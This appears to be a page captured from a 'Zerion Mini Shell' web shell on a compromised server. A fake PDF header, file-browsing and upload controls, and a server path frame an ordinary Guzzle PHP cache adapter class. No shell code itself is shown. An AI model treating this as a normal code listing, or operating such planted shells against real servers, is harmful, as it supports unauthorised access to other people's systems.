%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/graphicd/public_html/vebto/vendor/guzzle/guzzle/src/Guzzle/Cache/
Upload File :
Create Path :
Current File : /home/graphicd/public_html/vebto/vendor/guzzle/guzzle/src/Guzzle/Cache/AbstractCacheAdapter.php

<?php

namespace Guzzle\Cache;

/**
 * Abstract cache adapter
 */
abstract class AbstractCacheAdapter implements CacheAdapterInterface
{
    protected $cache;

    /**
     * Get the object owned by the adapter
     *
     * @return mixed
     */
    public function getCacheObject()
    {
        return $this->cache;
    }
}

Zerion Mini Shell 1.0